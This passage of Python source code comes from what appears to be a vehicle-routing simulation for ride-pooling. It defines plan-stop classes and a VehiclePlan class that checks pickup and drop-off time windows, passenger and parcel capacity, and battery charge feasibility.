number boarding parcels - number alighting parcels to check capacity constraint\n :param earliest_start_time: (float) absolute earliest start time this plan stop is allowed to start\n :param latest_start_time: (float) absolute latest start time this plan stop is allowed to start\n :param duration: (float) minimum duration this plan stops takes at this location\n :param earliest_end_time: (float) absolute earliest time a vehicle is allowed to leave at this plan stop\n :param locked: (bool) false by default; if true this planstop can no longer be unassigned from vehicleplan and has to be fullfilled. currently only working when also all planstops before this planstop are locked, too\n :param locked_end: (bool) false by default; if true, no planstops can be added after this planstop in the assignment algorithm and it cannot be removed by the assignemnt algorithm (insertions before are possible!)\n :param charging_power: optional (float); if given the vehicle is charged with this power (TODO unit!) while at this stop\n :param planstop_state: used to characterize the planstop state (task to to there)\n :param charging_task_id: the stationary task to be performed at the plan stop\n :param status: vehicle status while performing the current plan stop\n \"\"\"\n \n self.pos = position\n self.state = planstop_state\n \n self.boarding_dict = boarding_dict # +1: [rids] for boarding | -1: [rids] for alighting\n self.locked = locked\n self.locked_end = locked_end\n \n # charging\n self.charging_power = charging_power\n \n # parameters that define capacity constraints\n self.change_nr_pax = change_nr_pax\n self.change_nr_parcels = change_nr_parcels\n # parameters that define time constraints\n self.max_trip_time_dict = max_trip_time_dict # deboarding rid -> max_trip_time constraint\n self.latest_arrival_time_dict = latest_arrival_time_dict # deboarding rid -> latest_arrival_time constraint\n self.earliest_pickup_time_dict = earliest_pickup_time_dict # boarding rid -> earliest pickup time\n self.latest_pickup_time_dict = latest_pickup_time_dict # boarding rid -> latest pickup time\n if type(self.boarding_dict) != dict:\n raise TypeError\n if type(self.max_trip_time_dict) != dict:\n raise TypeError\n if type(self.latest_arrival_time_dict) != dict:\n raise TypeError\n if type(self.earliest_pickup_time_dict) != dict:\n raise TypeError\n if type(self.latest_pickup_time_dict) != dict:\n raise TypeError\n # constraints independent from boarding processes\n self.direct_earliest_start_time = earliest_start_time\n self.direct_latest_start_time = latest_start_time\n \n self.direct_duration = duration\n self.direct_earliest_end_time = earliest_end_time\n if duration is not None:\n x = int(self.direct_duration)\n \n # constraints (will be computed in update travel time by evaluating the whole plan)\n self._latest_start_time = None\n self._earliest_start_time = None \n \n # planning properties (will be set during evaluation of whole plan)\n self._planned_arrival_time = None\n self._planned_departure_time = None\n self._planned_arrival_soc = None\n self._planned_departure_soc = None\n\n self.started_at = None # is only set in update_plan\n self.infeasible_locked = False\n\n self.charging_task_id: Tuple[int, str] = charging_task_id\n \n def get_pos(self) -> tuple:\n \"\"\"returns network position of this plan stop\n :return: network position tuple \"\"\"\n return self.pos\n \n def get_state(self) -> G_PLANSTOP_STATES:\n return self.state\n \n def get_list_boarding_rids(self) -> list:\n \"\"\"returns list of all request ids boarding at this plan stop\n :return: list of boarding rids\"\"\"\n return self.boarding_dict.get(1, [])\n \n def get_list_alighting_rids(self) -> list:\n \"\"\" returns list of all request ids alighting at this plan stop\n :return: list of alighting rids\"\"\"\n return self.boarding_dict.get(-1, [])\n\n def get_charging_task_id(self) -> Tuple[int, str]:\n \"\"\" returns the id of the stationary charging process of the plan stop if present\n :return: charging task id (tuple(charging operator id, task id)); None if not present\"\"\"\n return self.charging_task_id\n\n def copy(self):\n \"\"\" this function returns the copy of a plan stop\n :return: PlanStop copy\n \"\"\"\n cp_ps = PlanStop(self.pos, boarding_dict=self.boarding_dict.copy(), max_trip_time_dict=self.max_trip_time_dict.copy(),\n latest_arrival_time_dict=self.latest_arrival_time_dict.copy(), earliest_pickup_time_dict=self.earliest_pickup_time_dict.copy(),\n latest_pickup_time_dict=self.latest_pickup_time_dict.copy(), change_nr_pax=self.change_nr_pax, change_nr_parcels=self.change_nr_parcels,\n earliest_start_time=self.direct_earliest_start_time, latest_start_time=self.direct_latest_start_time,\n duration=self.direct_duration, earliest_end_time=self.direct_earliest_end_time, locked=self.locked, locked_end=self.locked_end,\n charging_power=self.charging_power, charging_task_id=self.charging_task_id, planstop_state=self.state)\n cp_ps._planned_arrival_time = self._planned_arrival_time\n cp_ps._planned_departure_time = self._planned_departure_time\n cp_ps._planned_arrival_soc = self._planned_arrival_soc\n cp_ps._planned_departure_soc = self._planned_departure_soc\n cp_ps.started_at = self.started_at\n return cp_ps\n\n def get_earliest_start_time(self) -> float:\n \"\"\" this function evaluates all time constraints and returns the\n earliest start time for the PlanStop\n :return: (float) earliest start time \"\"\"\n self._earliest_start_time = -1\n if self.direct_earliest_start_time is not None and self.direct_earliest_start_time > self._earliest_start_time:\n self._earliest_start_time = self.direct_earliest_start_time\n if len(self.earliest_pickup_time_dict.values()) > 0:\n ept = np.floor(max(self.earliest_pickup_time_dict.values()))\n if ept > self._earliest_start_time:\n self._earliest_start_time = ept\n #LOG.debug(\"get earliest start time: {}\".format(str(self)))\n return self._earliest_start_time \n\n def get_latest_start_time(self, pax_infos : dict) -> float:\n \"\"\" this function evaluates all time constraints and returns the \n latest start time of the Plan Stop.\n if maximum trip time constraints are applied, infos about boarding times are need to evaluate the\n latest drop off time constraints\n :param pax_infos: (dict) from corresponding vehicle plan rid -> list (boarding_time, deboarding time) (only boarding time needed)\n :return: (float) latest start time\"\"\"\n self._latest_start_time = LARGE_INT\n if self.direct_latest_start_time is not None and self.direct_latest_start_time < self._latest_start_time:\n self._latest_start_time = self.direct_latest_start_time\n if len(self.latest_pickup_time_dict.values()) > 0:\n la = np.ceil(min(self.latest_pickup_time_dict.values()))\n if la < self._latest_start_time:\n self._latest_start_time = la\n if len(self.max_trip_time_dict.values()) > 0:\n la = np.ceil(min((pax_infos[rid][0] + self.max_trip_time_dict[rid] for rid in self.boarding_dict.get(-1, []))))\n if la < self._latest_start_time:\n self._latest_start_time = la\n if len(self.latest_arrival_time_dict.values()) > 0:\n la = np.ceil(min(self.latest_arrival_time_dict.values()))\n if la < self._latest_start_time:\n self._latest_start_time = la\n #LOG.debug(\"get latest start time: {}\".format(str(self)))\n return self._latest_start_time\n \n def get_started_at(self) -> float:\n return self.started_at\n \n def get_change_nr_pax(self) -> int:\n return self.change_nr_pax\n \n def get_change_nr_parcels(self) -> int:\n return self.change_nr_parcels\n \n def get_departure_time(self, start_time: float) -> float:\n \"\"\" this function returns the time the vehicle leaves the plan stop if it is started at start_time\n :param start_time: time the plan stop has been started\n :return: time vehicle is supposed to leave\"\"\"\n departure_time = start_time\n if self.direct_duration is not None:\n departure_time = start_time + self.direct_duration\n if self.direct_earliest_end_time is not None and departure_time < self.direct_earliest_end_time:\n departure_time = self.direct_earliest_end_time\n return departure_time\n \n def get_duration_and_earliest_departure(self) -> tuple:\n return self.direct_duration, self.direct_earliest_end_time\n \n def get_charging_power(self) -> float:\n return self.charging_power\n \n def get_boarding_time_constraint_dicts(self) -> Tuple[Dict, Dict, Dict, Dict]:\n return self.earliest_pickup_time_dict, self.latest_pickup_time_dict, self.max_trip_time_dict, self.latest_arrival_time_dict\n\n def get_planned_arrival_and_departure_time(self) -> Tuple[float, float]:\n return self._planned_arrival_time, self._planned_departure_time\n \n def get_planned_arrival_and_departure_soc(self) -> Tuple[float, float]:\n return self._planned_arrival_soc, self._planned_departure_soc\n\n def is_inactive(self) -> bool:\n \"\"\" this function evaluates if this is an inactive PlanStop (i.e. undefined duration and no tasks)\n :return: (bool) True if inactive, else False \"\"\"\n if self.state == G_PLANSTOP_STATES.INACTIVE or self.get_departure_time(0) > LARGE_INT:\n return True\n else:\n return False\n \n def is_locked(self) -> bool:\n return self.locked\n \n def is_locked_end(self) -> bool:\n return self.locked_end\n \n def is_infeasible_locked(self) -> bool:\n return self.infeasible_locked\n \n def set_locked(self, locked: bool):\n self.locked = locked\n \n def set_infeasible_locked(self, infeasible_locked: bool):\n self.infeasible_locked = infeasible_locked\n \n def set_started_at(self, start_time: float):\n self.started_at = start_time\n \n def set_planned_arrival_and_departure_soc(self, arrival_soc: float, departure_soc: float):\n self._planned_arrival_soc = arrival_soc\n self._planned_departure_soc = departure_soc\n \n def set_planned_arrival_and_departure_time(self, arrival_time: float, departure_time: float):\n self._planned_arrival_time = arrival_time\n self._planned_departure_time = departure_time\n \n def set_duration_and_earliest_end_time(self, duration: float = None, earliest_end_time: float = None):\n if duration is not None:\n self.direct_duration = duration\n if earliest_end_time is not None:\n self.direct_earliest_end_time = earliest_end_time\n \n def update_rid_boarding_time_constraints(self, rid, new_earliest_pickup_time: float = None, new_latest_pickup_time: float = None):\n if new_earliest_pickup_time is not None:\n self.earliest_pickup_time_dict[rid] = new_earliest_pickup_time\n if new_latest_pickup_time is not None:\n self.latest_pickup_time_dict[rid] = new_latest_pickup_time\n \n def update_rid_alighting_time_constraints(self, rid, new_maxmium_travel_time: float = None, new_latest_dropoff_time: float = None):\n if new_maxmium_travel_time is not None:\n self.max_trip_time_dict[rid] = new_maxmium_travel_time\n if new_latest_dropoff_time is not None:\n self.latest_arrival_time_dict[rid] = new_latest_dropoff_time\n\n def __str__(self):\n return f\"PS: {self.pos} state {self.state.name} locked {self.locked} bd {self.boarding_dict} earl dep {self._earliest_start_time} latest arr \" \\\n f\"{self._latest_start_time} eta {self._planned_arrival_time}\"\n\n def is_empty(self) -> bool:\n \"\"\" tests if nothing has to be done here and its just a routing target marker (i.e. reloc target)\n :return: (bool)\"\"\"\n if self.change_nr_pax == 0 and len(self.boarding_dict.get(1, [])) == 0 and len(self.boarding_dict.get(-1, [])) == 0 and self.charging_power == 0: #and len(self.planned_departure) == 0\n return True\n else:\n return False\n\nclass BoardingPlanStop(PlanStop):\n \"\"\" this class can be used to generate a plan stop where only boarding processes take place \"\"\"\n def __init__(self, position, boarding_dict={}, max_trip_time_dict={}, latest_arrival_time_dict={},\n earliest_pickup_time_dict={}, latest_pickup_time_dict={}, change_nr_pax=0, change_nr_parcels=0, duration=None, locked=False):\n \"\"\"\n :param position: network position (3 tuple) of the position this PlanStops takes place (target for routing)\n :param boarding_dict: dictionary with entries +1 -> list of request ids that board the vehicle there; -1 -> list of requests that alight the vehicle there\n :param max_trip_time_dict: dictionary request_id -> maximum trip time of all requests alighting at this stop to check max trip time constraint\n :param latest_arrival_time_dict: dictionary request_id -> absolute latest arival time of all requests alighting at this stop to check latest arrival time constraint\n :param earliest_pickup_time_dict: dictionary request_id -> earliest pickup time of all requests boarding at this stop to check earliest pickup time constraint\n :param latest_pickup_time_dict: dictionary request_id -> latest pickup time of all requests boarding at this top to check latest pickup time constraint\n :param change_nr_pax: (int) change of number of passengers at this point: number people boarding - number people alighting to check capacity constraint\n :param change_nr_parcels: (int) change of number of parcels at this point: number boarding parcels - number alighting parcels to check capacity constraint\n :param duration: (float) minimum duration this plan stops takes at this location\n :param locked: (bool) false by default; if true this planstop can no longer be unassigned from vehicleplan and has to be fullfilled. currently only working when also all planstops before this planstop are locked, too\n \"\"\"\n super().__init__(position, boarding_dict=boarding_dict, max_trip_time_dict=max_trip_time_dict,\n latest_arrival_time_dict=latest_arrival_time_dict, earliest_pickup_time_dict=earliest_pickup_time_dict,\n latest_pickup_time_dict=latest_pickup_time_dict, change_nr_pax=change_nr_pax, change_nr_parcels=change_nr_parcels,\n earliest_start_time=None, latest_start_time=None,\n duration=duration, earliest_end_time=None, locked=locked,\n charging_power=0, planstop_state=G_PLANSTOP_STATES.BOARDING)\n \nclass RoutingTargetPlanStop(PlanStop):\n \"\"\" this plan stop can be used to schedule a routing target for vehicles with the only task to drive there\n i.e repositioning\"\"\"\n def __init__(self, position, earliest_start_time=None, latest_start_time=None, duration=None, earliest_end_time=None, locked=False, locked_end=True, planstop_state=G_PLANSTOP_STATES.REPO_TARGET):\n \"\"\"\n :param position: network position (3 tuple) of the position this PlanStops takes place (target for routing)\n :param earliest_start_time: (float) absolute earliest start time this plan stop is allowed to start\n :param latest_start_time: (float) absolute latest start time this plan stop is allowed to start\n :param duration: (float) minimum duration this plan stops takes at this location\n :param earliest_end_time: (float) absolute earliest time a vehicle is allowed to leave at this plan stop\n :param locked: (bool) false by default; if true this planstop can no longer be unassigned from vehicleplan and has to be fullfilled. currently only working when also all planstops before this planstop are locked, too\n :param locked_end: (bool) false by default; if true, no planstops can be added after this planstop in the assignment algorithm and it cannot be removed by the assignemnt algorithm (insertions before are possible!)\n :param planstop_state: (G_PLANSTOP_STATES) indicates the planstop state. should be in (REPO_TARGET, INACTIVE, RESERVATION)\n \"\"\"\n super().__init__(position, boarding_dict={}, max_trip_time_dict={}, latest_arrival_time_dict={}, earliest_pickup_time_dict={}, latest_pickup_time_dict={},\n change_nr_pax=0, earliest_start_time=earliest_start_time, latest_start_time=latest_start_time, duration=duration,\n earliest_end_time=earliest_end_time, locked=locked, locked_end=locked_end, charging_power=0, planstop_state=planstop_state)\n\nclass ChargingPlanStop(PlanStop):\n \"\"\" this plan stop can be used to schedule a charging only process \"\"\"\n def __init__(self, position, earliest_start_time=None, latest_start_time=None, duration=None, \n earliest_end_time=None, locked=False, locked_end=False, charging_power=0,\n charging_task_id: Tuple[int, str] = None, status: Optional[VRL_STATES] = None):\n \"\"\"\n :param position: network position (3 tuple) of the position this PlanStops takes place (target for routing)\n :param earliest_start_time: (float) absolute earliest start time this plan stop is allowed to start\n :param latest_start_time: (float) absolute latest start time this plan stop is allowed to start\n :param duration: (float) minimum duration this plan stops takes at this location\n :param earliest_end_time: (float) absolute earliest time a vehicle is allowed to leave at this plan stop\n :param locked: (bool) false by default; if true this planstop can no longer be unassigned from vehicleplan and has to be fullfilled. currently only working when also all planstops before this planstop are locked, too\n :param locked_end: (bool) false by default; if true, no planstops can be added after this planstop in the assignment algorithm and it cannot be removed by the assignemnt algorithm (insertions before are possible!) \n :param charging_power: optional (float); if given the vehicle is charged with this power (TODO unit!) while at this stop\n \"\"\"\n super().__init__(position, boarding_dict={}, max_trip_time_dict={}, latest_arrival_time_dict={}, \n earliest_pickup_time_dict={}, latest_pickup_time_dict={}, change_nr_pax=0, \n earliest_start_time=earliest_start_time, latest_start_time=latest_start_time, duration=duration, \n earliest_end_time=earliest_end_time, locked=locked, locked_end=locked_end, charging_power=charging_power, \n planstop_state=G_PLANSTOP_STATES.CHARGING, charging_task_id=charging_task_id, status=status)\n\nclass VehiclePlan:\n \"\"\" this class is used to plan tasks for a vehicle and evaluates feasiblity of time constraints of this plan\n a Vehicle mainly consists of two parts:\n - a vehicle this plan is assigned to, and therefore the current state of the vehicle\n - an ordered list of PlanStops defining the tasks the vehicle is supposed to perform (vehicles move from one plan stop to another)\"\"\"\n def __init__(self, veh_obj : SimulationVehicle, sim_time : float, routing_engine : NetworkBase, list_plan_stops : List[PlanStopBase], copy: bool =False, external_pax_info : dict = {}):\n \"\"\"\n :param veh_obj: corresponding simulation vehicle reference\n :param sim_time: current simulation time\n :param routing_engine: reference to routing engine\n :param list_plan_stops: ordered list of plan stops to perform\n :param copy: optional; set if an init is set for creation of a copy of the plan (only for internal use)\n :param external_pax_info: optional; dictionary of allready computed pax info (only for internal use)\n \"\"\"\n self.list_plan_stops = list_plan_stops\n self.utility = None\n # pax info:\n # rid -> [start_boarding, end_alighting] where start_boarding can be in past or planned\n # rid -> [start_boarding_time] in case only boarding is planned\n self.pax_info = external_pax_info\n self.vid = None\n self.feasible = None\n self.structural_feasible = True # indicates if plan is in line with vehicle state ignoring time constraints\n if not copy:\n self.vid = veh_obj.vid\n self.feasible = self.update_tt_and_check_plan(veh_obj, sim_time, routing_engine, keep_feasible=True)\n\n def __str__(self):\n return \"veh plan for vid {} feasible? {} : {} | pax info {}\".format(self.vid, self.feasible,\n [str(x) for x in self.list_plan_stops],\n self.pax_info)\n\n def copy(self):\n \"\"\"\n creates a copy\n \"\"\"\n tmp_VehiclePlan = VehiclePlan(None, None, None, [ps.copy() for ps in self.list_plan_stops], copy=True)\n tmp_VehiclePlan.vid = self.vid\n tmp_VehiclePlan.utility = self.utility\n tmp_VehiclePlan.pax_info = self.pax_info.copy()\n tmp_VehiclePlan.feasible = True\n return tmp_VehiclePlan\n\n def is_feasible(self) -> bool:\n \"\"\" this method can be used to check of plan is feasible\n :return: (bool) True if feasible\"\"\"\n return self.feasible\n\n def is_structural_feasible(self) -> bool:\n \"\"\" indicates if stop order is feasible with current vehicles state (ignoring time constraints) \n :return: (bool) True if structural feasible \"\"\"\n return self.structural_feasible\n\n def get_pax_info(self, rid) -> list:\n \"\"\" this function returns passenger infos regarding planned boarding and alighting time for this plan\n :param rid: request id involved in this plan\n :return: list with maximally length 2; first entry planned boarding time; second entry planned alighting time; None if no information found\"\"\"\n return self.pax_info.get(rid)\n\n def get_involved_request_ids(self) -> list:\n \"\"\" get a list of all request ids that are scheduled in this plan \n :return: list of request ids\"\"\"\n return list(self.pax_info.keys())\n\n def set_utility(self, utility_value : float):\n \"\"\" this method is used to set the utility (cost function value) of this plan\n :param utility_value: float of utility value\"\"\"\n self.utility = utility_value\n\n def get_utility(self) -> float:\n \"\"\" returns the utility value of the plan (None if not set yet)\n :return: utility value (cost function value) or None\"\"\"\n return self.utility\n\n def add_plan_stop(self, plan_stop : PlanStopBase, veh_obj : SimulationVehicle, sim_time : float, routing_engine : NetworkBase, return_copy : bool=False, position : tuple=None):\n \"\"\"This method adds a plan stop to an existing vehicle plan. After that, it updates the plan.\n\n :param plan_stop: new plan stop\n :param veh_obj: simulation vehicle instance\n :param sim_time: current simulation time\n :param routing_engine: routing engine\n :param return_copy: controls whether the current plan is changed or a changed copy will be returned\n :param position: position in list_plan_stops in which the plan stop should be added\n :return: None (return_copy=False) or VehiclePlan instance (return_copy=True)\n \"\"\"\n if return_copy:\n new_veh_plan = self.copy()\n else:\n new_veh_plan = self\n if position is None:\n new_veh_plan.list_plan_stops.append(plan_stop)\n else:\n new_veh_plan.list_plan_stops.insert(position, plan_stop)\n new_veh_plan.update_tt_and_check_plan(veh_obj, sim_time, routing_engine, keep_feasible=True)\n\n def update_plan(self, veh_obj : SimulationVehicle, sim_time : float, routing_engine : NetworkBase, list_passed_VRLs : List[VehicleRouteLeg]=None, keep_time_infeasible : bool=True) -> bool:\n \"\"\"This method checks whether the simulation vehicle passed some of the planned stops and removes them from the\n plan after passing. It returns the feasibility of the plan.\n\n :param veh_obj: vehicle object to which plan is applied\n :param sim_time: current simulation time\n :param routing_engine: reference to routing engine\n :param list_passed_VRLs: list of passed VRLs\n :param keep_time_infeasible: if True full evaluation of feasiblity even though infeasibility of time constraints have been found\n :return: is_feasible returns True if all\n \"\"\"\n # 1) check if list_passed_VRLs invalidates the plan or removes some stops\n # LOG.debug(\"update_plan\")\n self.feasible = True\n if list_passed_VRLs is None:\n list_passed_VRLs = []\n # LOG.debug(str(self))\n # LOG.debug([str(x) for x in list_passed_VRLs])\n # LOG.debug([str(x) for x in self.list_plan_stops])\n key_translator = {sub_rid[0]: sub_rid for sub_rid in self.pax_info.keys() if type(sub_rid) == tuple}\n if list_passed_VRLs and self.list_plan_stops:\n for vrl in list_passed_VRLs:\n if vrl.status in G_DRIVING_STATUS or vrl.status in G_LAZY_STATUS:\n continue\n # if vrl.status in G_LAZY_STATUS:\n # # waiting part should not be part of the vehicle plan\n # continue\n # if vrl.status in G_DRIVING_STATUS or vrl.status in G_LAZY_STATUS:\n # if vrl.destination_pos == self.list_plan_stops[0].get_pos() and self.list_plan_stops[0].is_empty():\n # # LOG.info(\"jumped ps {} becouse of vrl {}\".format(self.list_plan_stops[0], vrl))\n # self.list_plan_stops = self.list_plan_stops[1:]\n # continue\n if vrl.destination_pos == self.list_plan_stops[0].get_pos():\n # plan infeasible as soon as other people board the vehicle\n rid_boarded_at_stop = set([key_translator.get(rq.get_rid_struct(), rq.get_rid_struct())\n for rq in vrl.rq_dict.get(1, [])])\n if not rid_boarded_at_stop == set(self.list_plan_stops[0].get_list_boarding_rids()):\n # LOG.debug(\" -> wrong boarding\")\n self.feasible = False\n self.structural_feasible = False\n return False\n # other people alighting should not be possible. keep check nevertheless\n rid_alighted_at_stop = set([key_translator.get(rq.get_rid_struct(), rq.get_rid_struct()) for rq in\n vrl.rq_dict.get(-1, [])])\n if not rid_alighted_at_stop == set(self.list_plan_stops[0].get_list_alighting_rids()):\n # LOG.debug(\" -> wrong alighting\")\n self.feasible = False\n self.structural_feasible = False\n return False\n # remove stop from plan\n self.list_plan_stops = self.list_plan_stops[1:]\n else:\n # plan infeasible as soon as anybody boarded or alighted the vehicle\n if vrl.rq_dict.get(1) or vrl.rq_dict.get(-1):\n # LOG.debug(\" -> unplanned boarding step\")\n self.feasible = False\n self.structural_feasible = False\n return False\n # 2) check for current boarding processes and check if current stop should be locked\n if veh_obj.assigned_route and self.list_plan_stops:\n ca = veh_obj.assigned_route[0]\n if not ca.status in G_DRIVING_STATUS and not ca.status in G_LAZY_STATUS:\n if ca.destination_pos == self.list_plan_stops[0].get_pos():\n rid_boarding_at_stop = set(\n [key_translator.get(rq.get_rid_struct(), rq.get_rid_struct()) for rq in ca.rq_dict.get(1, [])])\n if not rid_boarding_at_stop == set(self.list_plan_stops[0].get_list_boarding_rids()):\n # LOG.debug(\" -> current boarding states is wrong!\")\n self.feasible = False\n self.structural_feasible = False\n return False\n rid_deboarding_at_stop = set(\n [key_translator.get(rq.get_rid_struct(), rq.get_rid_struct()) for rq in ca.rq_dict.get(-1, [])])\n if not rid_deboarding_at_stop == set(self.list_plan_stops[0].get_list_alighting_rids()):\n # LOG.debug(\" -> current deboarding states is wrong!\")\n self.feasible = False\n self.structural_feasible = False\n return False\n else:\n # LOG.debug(\" -> infeasible planned stop\")\n self.feasible = False\n self.structural_feasible = False\n return False\n\n if ca.locked and ca.destination_pos == self.list_plan_stops[0].get_pos():\n # LOG.debug(\" -> LOCK!\")\n self.list_plan_stops[0].set_locked(True)\n # LOG.verbose(\"set starting time: {}\".format(veh_obj.cl_start_time))\n if not ca.status in G_DRIVING_STATUS and not ca.status in G_LAZY_STATUS: # TODO #\n self.list_plan_stops[0].set_started_at(veh_obj.cl_start_time)\n\n # 3) update planned attributes (arrival_time, arrival_soc, departure)\n # LOG.debug(\"after update plan:\")\n # LOG.debug(str(self))\n # LOG.debug(f\"currently ob: {veh_obj.pax}\")\n self.feasible = self.update_tt_and_check_plan(veh_obj, sim_time, routing_engine,\n keep_feasible=keep_time_infeasible)\n return self.feasible\n\n def return_intermediary_plan_state(self, veh_obj : SimulationVehicle, sim_time : float, routing_engine : NetworkBase, stop_index : int) -> dict:\n \"\"\" this function evalutes the future vehicle state after it would have performed the next stop_index plan stops of the vehicle plan\n and returns a dictionary specifing the vehicle state\n :param veh_obj: reference the vehicle object\n :param sim_time: simulation time\n :param routing_engine: routing engine reference\n :param stop_index: index of list plan stops of vehicle plan until the state is evaluated\n :return: dictionary specifying the future vehicle state\"\"\"\n c_pos = veh_obj.pos\n c_soc = veh_obj.soc\n c_time = sim_time\n if self.list_plan_stops[0].is_locked(): # set time at start_time of boarding process\n boarding_startet = self.list_plan_stops[0].get_started_at()\n if boarding_startet is not None:\n c_time = boarding_startet\n key_translator = {sub_rid[0]: sub_rid for sub_rid in self.pax_info.keys() if type(sub_rid) == tuple}\n c_pax = {key_translator.get(rq.get_rid_struct(), rq.get_rid_struct()): 1 for rq in veh_obj.pax}\n nr_pax = veh_obj.get_nr_pax_without_currently_boarding() # sum([rq.nr_pax for rq in veh_obj.pax])\n nr_parcels = veh_obj.get_nr_parcels_without_currently_boarding()\n self.pax_info = {}\n for rq in veh_obj.pax:\n rid = key_translator.get(rq.get_rid_struct(), rq.get_rid_struct())\n self.pax_info[rid] = [rq.pu_time]\n # for pstop in self.list_plan_stops[:stop_index + 1]:\n for i, pstop in enumerate(self.list_plan_stops[:stop_index + 1]):\n if c_pos != pstop.get_pos():\n _, tt, tdist = routing_engine.return_travel_costs_1to1(c_pos, pstop.get_pos())\n c_pos = pstop.get_pos()\n c_time += tt\n c_soc -= veh_obj.compute_soc_consumption(tdist)\n if c_pos == pstop.get_pos():\n last_c_time = c_time\n last_c_soc = c_soc\n\n earliest_time = pstop.get_earliest_start_time()\n if c_time < earliest_time:\n c_time = earliest_time\n # LOG.debug(f\"c_time 3 {c_time}\")\n # update pax and check max. passenger constraint\n nr_pax += pstop.get_change_nr_pax()\n nr_parcels += pstop.get_change_nr_parcels()\n for rid in pstop.get_list_boarding_rids():\n if self.pax_info.get(rid):\n continue\n self.pax_info[rid] = [c_time]\n c_pax[rid] = 1\n for rid in pstop.get_list_alighting_rids():\n self.pax_info[rid].append(c_time)\n try:\n del c_pax[rid]\n except KeyError:\n LOG.warning(f\"update_tt_and_check_plan(): try to remove a rid that is not on board!\")\n \n # set departure time\n c_time = pstop.get_departure_time(c_time)\n pstop.set_planned_arrival_and_departure_time(last_c_time, c_time)\n # set charge\n if pstop.get_charging_power() > 0: # TODO # is charging now in waiting included as planned here?\n c_soc += veh_obj.compute_soc_charging(pstop.get_charging_power(), c_time - last_c_time)\n c_soc = max(c_soc, 1.0)\n pstop.set_planned_arrival_and_departure_soc(last_c_soc, c_soc)\n \n return {\"stop_index\": stop_index, \"c_pos\": c_pos, \"c_soc\": c_soc, \"c_time\": c_time, \"c_pax\": c_pax,\n \"pax_info\": self.pax_info.copy(), \"c_nr_pax\": nr_pax, \"c_nr_parcels\" : nr_parcels}\n\n def update_tt_and_check_plan(self, veh_obj : SimulationVehicle, sim_time : float, routing_engine : NetworkBase, init_plan_state : dict=None, keep_feasible : bool=False):\n \"\"\"This method updates the planning properties of all PlanStops of the Plan according to the new vehicle\n position and checks if it is still feasible.\n\n :param veh_obj: vehicle object to which plan is applied\n :param sim_time: current simulation time\n :param routing_engine: reference to routing engine\n :param init_plan_state: {} requires \"stop_index\" \"c_index\", \"c_pos\", \"c_soc\", \"c_time\", \"c_pax\" and \"pax_info\"\n :param keep_feasible: useful flag to keep assigned VehiclePlans for simulations with dynamic travel times\n :return: is_feasible returns True if all\n \"\"\"\n # TODO # think about update of duration of VehicleChargeLegs\n # LOG.debug(f\"update tt an check plan {veh_obj} pax {veh_obj.pax} | at {sim_time} | pax info {self.pax_info}\")\n is_feasible = True\n if len(self.list_plan_stops) == 0:\n self.pax_info = {}\n return is_feasible\n infeasible_index = -1 # lock all plan stops until last infeasible stop if vehplan is forced to stay feasible\n if init_plan_state is not None:\n start_stop_index = init_plan_state[\"stop_index\"] + 1\n c_pos = init_plan_state[\"c_pos\"]\n c_soc = init_plan_state[\"c_soc\"]\n c_time = init_plan_state[\"c_time\"]\n c_pax = init_plan_state[\"c_pax\"].copy()\n c_nr_pax = init_plan_state[\"c_nr_pax\"]\n c_nr_parcels = init_plan_state[\"c_nr_parcels\"]\n self.pax_info = {}\n for k, v in init_plan_state[\"pax_info\"].items():\n self.pax_info[k] = v.copy()\n # LOG.debug(f\"init plan state available | c_pos {c_pos} c_pax {c_pax} pax info {self.pax_info}\")\n else:\n key_translator = {sub_rid[0]: sub_rid for sub_rid in self.pax_info.keys() if type(sub_rid) == tuple}\n self.pax_info = {}\n start_stop_index = 0\n c_pos = veh_obj.pos\n c_soc = veh_obj.soc\n c_time = sim_time\n if self.list_plan_stops[0].is_locked(): # set time at start_time of boarding process\n boarding_started = self.list_plan_stops[0].get_started_at()\n if boarding_started is not None:\n c_time = boarding_started\n c_pax = {key_translator.get(rq.get_rid_struct(), rq.get_rid_struct()): 1 for rq in veh_obj.pax}\n c_nr_pax = veh_obj.get_nr_pax_without_currently_boarding() # sum([rq.nr_pax for rq in veh_obj.pax])\n c_nr_parcels = veh_obj.get_nr_parcels_without_currently_boarding()\n for rq in veh_obj.pax:\n # LOG.debug(f\"add pax info {rq.get_rid_struct()} : {rq.pu_time}\")\n rid = key_translator.get(rq.get_rid_struct(), rq.get_rid_struct())\n self.pax_info[rid] = [rq.pu_time]\n #LOG.verbose(\"init pax {} | {} | {}\".format(c_pax, veh_obj.pax, self.pax_info))\n # LOG.debug(f\"c_time 1 {c_time}\")\n for i in range(start_stop_index, len(self.list_plan_stops)):\n pstop = self.list_plan_stops[i]\n #for i, pstop in enumerate(self.list_plan_stops[start_stop_index:], start=start_stop_index):\n pstop_pos = pstop.get_pos()\n if c_pos != pstop_pos:\n if not is_feasible and not keep_feasible:\n # LOG.debug(f\" -> break because infeasible | is feasible {is_feasible} keep_feasible {keep_feasible}\")\n break\n _, tt, tdist = routing_engine.return_travel_costs_1to1(c_pos, pstop_pos)\n c_pos = pstop_pos\n c_time += tt\n # LOG.debug(f\"c_time 2 {c_time}\")\n\n c_soc -= veh_obj.compute_soc_consumption(tdist)\n if c_soc < 0:\n is_feasible = False\n infeasible_index = i\n # LOG.debug(\" -> charging wrong\")\n\n if c_pos == pstop_pos:\n\n last_c_time = c_time\n last_c_soc = c_soc\n\n earliest_time = pstop.get_earliest_start_time()\n if c_time < earliest_time:\n c_time = earliest_time\n # LOG.debug(f\"c_time 3 {c_time}\")\n # update pax and check max. passenger constraint\n c_nr_pax += pstop.get_change_nr_pax()\n c_nr_parcels += pstop.get_change_nr_parcels()\n #LOG.debug(f\"change nr pax {pstop.change_nr_pax}\")\n for rid in pstop.get_list_boarding_rids():\n if i == 0 and self.pax_info.get(rid):\n continue\n self.pax_info[rid] = [c_time]\n c_pax[rid] = 1\n for rid in pstop.get_list_alighting_rids():\n self.pax_info[rid].append(c_time)\n try:\n del c_pax[rid]\n except KeyError:\n LOG.warning(f\"update_tt_and_check_plan(): try to remove a rid that is not on board!\")\n LOG.warning(f\"{self}\")\n is_feasible = False\n infeasible_index = i\n raise EnvironmentError\n # LOG.debug(\"pax info {}\".format(self.pax_info))\n latest_time = pstop.get_latest_start_time(self.pax_info)\n if c_time > latest_time:\n is_feasible = False\n infeasible_index = i\n # LOG.debug(f\" -> arrival after latest {c_time} > {latest_time}\")\n #LOG.debug(f\"-> c nr {c_nr_pax} | cap {veh_obj.max_pax}\")\n if c_nr_pax > veh_obj.max_pax or c_nr_parcels > veh_obj.max_parcels:\n # LOG.debug(\" -> capacity wrong\")\n is_feasible = False\n infeasible_index = 